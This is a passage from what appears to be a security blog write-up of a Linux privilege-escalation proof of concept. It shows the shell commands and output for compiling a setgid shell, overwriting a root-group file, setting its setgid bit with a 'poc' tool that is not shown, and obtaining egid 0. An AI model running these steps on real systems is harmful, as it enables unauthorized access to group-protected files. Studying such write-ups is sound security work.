vnik$ cat << EOF > shell.c
int main() {
    setgid(0);
    execl("/bin/bash", "-sh", 0);
}
EOF

vnik$ gcc shell.c -o shell
vnik$ cp shell test && ls -al ./test
-rw-r--r-- 1 vnik root  8564 Jun 20 13:20 test 
Now that we've replaced the test file with our shell (preserving the gid), let's set the setgid bit:
vnik$ ./poc ./test
vnik$ ls -al ./test
-rwxr-s--- 1 vnik root  8564 Jun 20 13:20 test
vnik$ ./test
-sh-4.3$ id  
uid=1000(vnik) gid=1000(vnik) egid=0(root) groups=1000(vnik)
We have egid = 0. Whoopty doo! Yes, we can now read and write files (that were previously only readable or writable by gid = 0) but that does not directly lead to root.


Source: http://hashcrack.org/index.html#190614


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.